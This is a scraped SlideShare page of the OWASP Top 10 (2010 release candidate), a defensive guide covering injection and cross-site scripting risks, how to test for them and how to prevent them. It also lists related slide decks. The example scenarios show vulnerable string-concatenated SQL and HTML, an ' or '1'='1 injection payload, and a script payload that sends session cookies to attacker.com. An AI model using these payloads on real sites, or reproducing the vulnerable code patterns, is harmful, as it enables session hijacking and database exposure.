SlideShare a Scribd company logo
1 of 21
Download to read offline
OWASP Top 10 (2010 release candidate 1)
About OWASP,[object Object],O,[object Object]
I,[object Object],Introduction,[object Object]
Release Notes,[object Object],RN,[object Object]
Weakness,[object Object], Weakness,[object Object],Weakness,[object Object],Weakness,[object Object],What Are Application Security Risks?,[object Object],Attackers can potentially use many different paths through your application to do harm to your business. Each of these paths represents a risk that may or may not be serious enough to warrant attention.,[object Object],Sometimes, these paths are trivial to find and exploit and sometimes they are extremely difficult. Similarly, the harm that is caused may range from nothing all the way through putting you out of business. To determine the risk to your organization, you can evaluate the likelihood associated with the threat agent, attack vector, and security weakness and combine it with an estimate of the technical and business impact to your organization.  Together, these factors determine the overall risk.,[object Object],ThreatAgents,[object Object],Attack,[object Object],Vectors,[object Object],SecurityWeaknesses,[object Object],Technical,[object Object],Impacts,[object Object],Business,[object Object],Impacts,[object Object],SecurityControls,[object Object],Impact,[object Object],Control,[object Object],Attack,[object Object],Asset,[object Object],Control,[object Object],Attack,[object Object],Impact,[object Object],Function,[object Object],Attack,[object Object],Impact,[object Object],Asset,[object Object],Control,[object Object],What’s My Risk?,[object Object],This update to the OWASP Top 10 focuses on identifying the most serious risks for a broad array of organizations. For each of these risks, we provide generic information about likelihood and technical impact using this simple ratings scheme, which is based on the OWASP Risk Rating Methodology.,[object Object],However, only you know the specifics of your environment and your business. For any given application, there may not be a threat agent that can perform the relevant attack.  Or the technical impact may not make any difference. Therefore, you should evaluate each risk for yourself, particularly looking at the threat agents, security controls, and business impacts in your enterprise.,[object Object],Although previous versions of the OWASP Top 10 focused on identifying the most common “vulnerabilities,” they were also designed around risk. The names of the risks in the Top 10 are sometimes based on the attack, sometimes on the weakness, and sometimes on the impact. We choose the name that is best known and will achieve the highest level of awareness.,[object Object],References,[object Object],OWASP,[object Object],[object Object]
Article on Threat/Risk ModelingExternal,[object Object],[object Object]
OCTAVE Risk Analysis Methodology
Microsoft Threat Modeling (STRIDE and DREAD)Application Security Risk,[object Object],R,[object Object]
OWASP Top 10 Application Security Risks – 2010 ,[object Object],T10,[object Object]
    Security          Weakness,[object Object], Technical   Impacts,[object Object],BusinessImpacts,[object Object],    Attack,[object Object],   Vectors,[object Object],ThreatAgents,[object Object],Am I Vulnerable To Injection?,[object Object],The best way to find out if an application is vulnerable to injection is to verify that all use of interpreters clearly separates untrusted data from the command or query.,[object Object],Checking the code is a fast and accurate way to see if the application uses interpreters safely. Code analysis tools can help a security analyst find the use of interpreters and trace the data flow through the application. Manual penetration testers can confirm these issues by crafting exploits that confirm the vulnerability.,[object Object],Automated dynamic scanning which exercises the application may provide insight into whether some exploitable injection problems exist. Scanners cannot always reach interpreters and can have difficulty detecting whether an attack was successful.,[object Object],How Do I Prevent Injection?,[object Object],Preventing injection requires keeping untrusted data separate from commands and queries.,[object Object],The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface.  Beware APIs, such as stored procedures, that appear parameterized, but may still allow injection under the hood.,[object Object],If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter. OWASP’s ESAPI has some of these escaping routines.,[object Object],Positive or “whitelist” input validation is also important and helps to protect against injection, but is not a complete defense as many applications require special characters in their input.,[object Object],Example Attack Scenario,[object Object],The application uses untrusted data in the construction of the following vulnerable SQL call:,[object Object],  String query = "SELECT * FROM accounts WHEREcustID='" + request.getParameter("id") +"'";,[object Object],The attacker modifies the ‘id’ parameter in their browser to send: ' or '1'='1. This changes the meaning of the query to return all the records from the accounts database, instead of only the intended customer’s.,[object Object],http://example.com/app/accountView?id=' or '1'='1 ,[object Object],In the worst case, the attacker uses this weakness to invoke special stored procedures in the database, allowing a complete takeover of the database host.,[object Object],References,[object Object],OWASP,[object Object],[object Object]
OWASP Injection Flaws Article
ESAPI Encoder API
OWASP Testing Guide: Chapter on SQL Injection Testing
OWASP Code Review Guide: Chapter on SQL Injection
OWASP Code Review Guide: Command InjectionExternal,[object Object],[object Object]
CWE Entry on SQL InjectionA1,[object Object],Injection,[object Object]
Cross Site Scripting (XSS),[object Object],A2,[object Object],    Security          Weakness,[object Object], Technical   Impacts,[object Object],BusinessImpacts,[object Object],    Attack,[object Object],   Vectors,[object Object],ThreatAgents,[object Object],Am I Vulnerable to XSS?,[object Object],You need to ensure that all user supplied input sent back to the browser is verified to be safe (via input validation), and that user input is properly escaped before it is included in the output page. Proper encoding ensures that such input is always treated as text in the browser, rather than active content.,[object Object],Both static and dynamic tools can find some XSS problems automatically. However, each application builds output pages differently and uses different browser side interpreters such as JavaScript, ActiveX, and Flash, which makes automated detection difficult. Therefore, complete coverage requires a combination of manual code review and manual penetration testing.,[object Object],Web 2.0 technologies such as AJAX makes XSS much more difficult to detect via automated tools.,[object Object],How Do I Prevent XSS?,[object Object],Preventing XSS requires keeping untrusted data separate from active browser content.,[object Object],The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. Developers need to include this escaping in their applications unless their UI framework does this for them. See the OWASP XSS Prevention Cheat Sheet for more information about escaping.,[object Object],Positive or “whitelist” input validation is also important and helps protect against XSS, but is not a complete defense due as many applications require special characters in their input. Such validation should, as much as possible, validate the length, characters, format, and any business rules on that data before accepting the input.,[object Object],Example Attack Scenario,[object Object],The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:,[object Object],  (String) page += "<input name='creditcard' type='TEXT‘  value='" + request.getParameter("CC") + "'>";,[object Object],The attacker modifies the ‘CC’ parameter in their browser to:,[object Object],'><script>document.location=  'http://www.attacker.com/cgi-bin/cookie.cgi?  '%20+document.cookie</script>.,[object Object],This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session. Note that attackers can also use XSS to defeat any CSRF defense the application might employ. See A5 for info on CSRF.,[object Object],References,[object Object],OWASP,[object Object],[object Object]
OWASP Cross Site Scripting Article
ESAPI Project Home Page
ESAPI Encoder API
ASVS: Output Encoding/Escaping Requirements (V6)

More Related Content

What's hot

OWASPAppSecEU2006_CanTestingToolsReallyFindOWASPTop10
OWASPAppSecEU2006_CanTestingToolsReallyFindOWASPTop10OWASPAppSecEU2006_CanTestingToolsReallyFindOWASPTop10
OWASPAppSecEU2006_CanTestingToolsReallyFindOWASPTop10Juan Golden Tiger
 
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksOWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksAndre Van Klaveren
 
Web application penetration testing
Web application penetration testingWeb application penetration testing
Web application penetration testingImaginea
 
OWASP Top 10 Vulnerabilities 2017- AppTrana
OWASP Top 10 Vulnerabilities 2017- AppTranaOWASP Top 10 Vulnerabilities 2017- AppTrana
OWASP Top 10 Vulnerabilities 2017- AppTranaIshan Mathur
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Axoss Web Application Penetration Testing Services
Axoss Web Application Penetration Testing ServicesAxoss Web Application Penetration Testing Services
Axoss Web Application Penetration Testing ServicesBulent Buyukkahraman
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingAnurag Srivastava
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTerrance Medina
 
A7 Missing Function Level Access Control
A7   Missing Function Level Access ControlA7   Missing Function Level Access Control
A7 Missing Function Level Access Controlstevil1224
 
OWASP TOP TEN 2017 RC1
OWASP TOP TEN 2017 RC1OWASP TOP TEN 2017 RC1
OWASP TOP TEN 2017 RC1Telefónica
 
Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threatsVishal Kumar
 
Security by the numbers
Security by the numbersSecurity by the numbers
Security by the numbersEoin Keary
 
DataMindsConnect2018_SECDEVOPS
DataMindsConnect2018_SECDEVOPSDataMindsConnect2018_SECDEVOPS
DataMindsConnect2018_SECDEVOPSTobias Koprowski
 
Sql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseSql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseNoaman Aziz
 
Owasp top 10 & Web vulnerabilities
Owasp top 10 & Web vulnerabilitiesOwasp top 10 & Web vulnerabilities
Owasp top 10 & Web vulnerabilitiesRIZWAN HASAN
 

What's hot (20)

OWASPAppSecEU2006_CanTestingToolsReallyFindOWASPTop10
OWASPAppSecEU2006_CanTestingToolsReallyFindOWASPTop10OWASPAppSecEU2006_CanTestingToolsReallyFindOWASPTop10
OWASPAppSecEU2006_CanTestingToolsReallyFindOWASPTop10
 
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksOWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security Risks
 
Web application penetration testing
Web application penetration testingWeb application penetration testing
Web application penetration testing
 
OWASP Top 10 Vulnerabilities 2017- AppTrana
OWASP Top 10 Vulnerabilities 2017- AppTranaOWASP Top 10 Vulnerabilities 2017- AppTrana
OWASP Top 10 Vulnerabilities 2017- AppTrana
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Owasp Top 10
Owasp Top 10Owasp Top 10
Owasp Top 10
 
Axoss Web Application Penetration Testing Services
Axoss Web Application Penetration Testing ServicesAxoss Web Application Penetration Testing Services
Axoss Web Application Penetration Testing Services
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
Owasp Top 10
Owasp Top 10Owasp Top 10
Owasp Top 10
 
t r
t rt r
t r
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilities
 
A7 Missing Function Level Access Control
A7   Missing Function Level Access ControlA7   Missing Function Level Access Control
A7 Missing Function Level Access Control
 
OWASP TOP TEN 2017 RC1
OWASP TOP TEN 2017 RC1OWASP TOP TEN 2017 RC1
OWASP TOP TEN 2017 RC1
 
Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threats
 
OWASP TOP 10 & .NET
OWASP TOP 10 & .NETOWASP TOP 10 & .NET
OWASP TOP 10 & .NET
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10
 
Security by the numbers
Security by the numbersSecurity by the numbers
Security by the numbers
 
DataMindsConnect2018_SECDEVOPS
DataMindsConnect2018_SECDEVOPSDataMindsConnect2018_SECDEVOPS
DataMindsConnect2018_SECDEVOPS
 
Sql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseSql injection bypassing hand book blackrose
Sql injection bypassing hand book blackrose
 
Owasp top 10 & Web vulnerabilities
Owasp top 10 & Web vulnerabilitiesOwasp top 10 & Web vulnerabilities
Owasp top 10 & Web vulnerabilities
 

Similar to OWASP Top 10 (2010 release candidate 1)

Appsec2013 assurance tagging-robert martin
Appsec2013 assurance tagging-robert martinAppsec2013 assurance tagging-robert martin
Appsec2013 assurance tagging-robert martindrewz lin
 
Protecting web apps
Protecting web appsProtecting web apps
Protecting web appsOmkar Parab
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developersJohn Ombagi
 
Soteria Cybersecurity Healthcheck-FB01
Soteria Cybersecurity Healthcheck-FB01Soteria Cybersecurity Healthcheck-FB01
Soteria Cybersecurity Healthcheck-FB01Richard Sullivan
 
Injecting Security into Web apps at Runtime Whitepaper
Injecting Security into Web apps at Runtime WhitepaperInjecting Security into Web apps at Runtime Whitepaper
Injecting Security into Web apps at Runtime WhitepaperAjin Abraham
 
Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security RisksSperasoft
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesMarco Morana
 
Continuous Application Security at Scale with IAST and RASP -- Transforming D...
Continuous Application Security at Scale with IAST and RASP -- Transforming D...Continuous Application Security at Scale with IAST and RASP -- Transforming D...
Continuous Application Security at Scale with IAST and RASP -- Transforming D...Jeff Williams
 
The Principles of Secure Development - David Rook
The Principles of Secure Development - David RookThe Principles of Secure Development - David Rook
The Principles of Secure Development - David RookSecurity B-Sides
 
Web security 2010
Web security 2010Web security 2010
Web security 2010Alok Babu
 
Hackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web ProgrammingHackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web ProgrammingAkash Mahajan
 

Similar to OWASP Top 10 (2010 release candidate 1) (20)

Security Awareness
Security AwarenessSecurity Awareness
Security Awareness
 
Owasp web security
Owasp web securityOwasp web security
Owasp web security
 
Secure Software Engineering
Secure Software EngineeringSecure Software Engineering
Secure Software Engineering
 
Appsec2013 assurance tagging-robert martin
Appsec2013 assurance tagging-robert martinAppsec2013 assurance tagging-robert martin
Appsec2013 assurance tagging-robert martin
 
Protecting web apps
Protecting web appsProtecting web apps
Protecting web apps
 
OWASP Top 10 Project
OWASP Top 10 ProjectOWASP Top 10 Project
OWASP Top 10 Project
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developers
 
Soteria Cybersecurity Healthcheck-FB01
Soteria Cybersecurity Healthcheck-FB01Soteria Cybersecurity Healthcheck-FB01
Soteria Cybersecurity Healthcheck-FB01
 
Injecting Security into Web apps at Runtime Whitepaper
Injecting Security into Web apps at Runtime WhitepaperInjecting Security into Web apps at Runtime Whitepaper
Injecting Security into Web apps at Runtime Whitepaper
 
Owasp Top 10-2013
Owasp Top 10-2013Owasp Top 10-2013
Owasp Top 10-2013
 
Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security Risks
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
 
OWASP Top10 2010
OWASP Top10 2010OWASP Top10 2010
OWASP Top10 2010
 
2 . web app s canners
2 . web app s canners2 . web app s canners
2 . web app s canners
 
ieee
ieeeieee
ieee
 
Continuous Application Security at Scale with IAST and RASP -- Transforming D...
Continuous Application Security at Scale with IAST and RASP -- Transforming D...Continuous Application Security at Scale with IAST and RASP -- Transforming D...
Continuous Application Security at Scale with IAST and RASP -- Transforming D...
 
The Principles of Secure Development - David Rook
The Principles of Secure Development - David RookThe Principles of Secure Development - David Rook
The Principles of Secure Development - David Rook
 
Web security 2010
Web security 2010Web security 2010
Web security 2010
 
Hackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web ProgrammingHackers versus Developers and Secure Web Programming
Hackers versus Developers and Secure Web Programming
 

More from Jeremiah Grossman

All these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterAll these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterJeremiah Grossman
 
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorHow to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorJeremiah Grossman
 
The Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryThe Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryJeremiah Grossman
 
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensExploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensJeremiah Grossman
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareJeremiah Grossman
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareJeremiah Grossman
 
Next Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideNext Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideJeremiah Grossman
 
Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Jeremiah Grossman
 
Ransomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowRansomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowJeremiah Grossman
 
Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Jeremiah Grossman
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage YearsJeremiah Grossman
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage YearsJeremiah Grossman
 
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Jeremiah Grossman
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015Jeremiah Grossman
 
No More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesNo More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesJeremiah Grossman
 
WhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedWhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedJeremiah Grossman
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportJeremiah Grossman
 
WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)Jeremiah Grossman
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Jeremiah Grossman
 

More from Jeremiah Grossman (20)

All these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterAll these vulnerabilities, rarely matter
All these vulnerabilities, rarely matter
 
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorHow to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare Sector
 
The Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryThe Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare Industry
 
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensExploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
 
Next Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideNext Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers Guide
 
Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?
 
Ransomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowRansomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to Know
 
Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
 
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015
 
No More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesNo More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security Guarantees
 
WhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedWhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report Explained
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics Report
 
Million Browser Botnet
Million Browser BotnetMillion Browser Botnet
Million Browser Botnet
 
WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012
 

Recently uploaded

Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024SkyPlanner
 
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsSafe Software
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureEric D. Schabell
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding TeamAdam Moalla
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Commit University
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarPrecisely
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesDavid Newbury
 
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfIaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfDaniel Santiago Silva Capera
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Websitedgelyza
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPathCommunity
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxMatsuo Lab
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaborationbruanjhuli
 
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...DianaGray10
 
20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-pyJamie (Taka) Wang
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationIES VE
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8DianaGray10
 
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDEADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDELiveplex
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesMd Hossain Ali
 

Recently uploaded (20)

Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024
 
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
 
20230104 - machine vision
20230104 - machine vision20230104 - machine vision
20230104 - machine vision
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability Adventure
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity Webinar
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond Ontologies
 
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfIaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Website
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation Developers
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptx
 
201610817 - edge part1
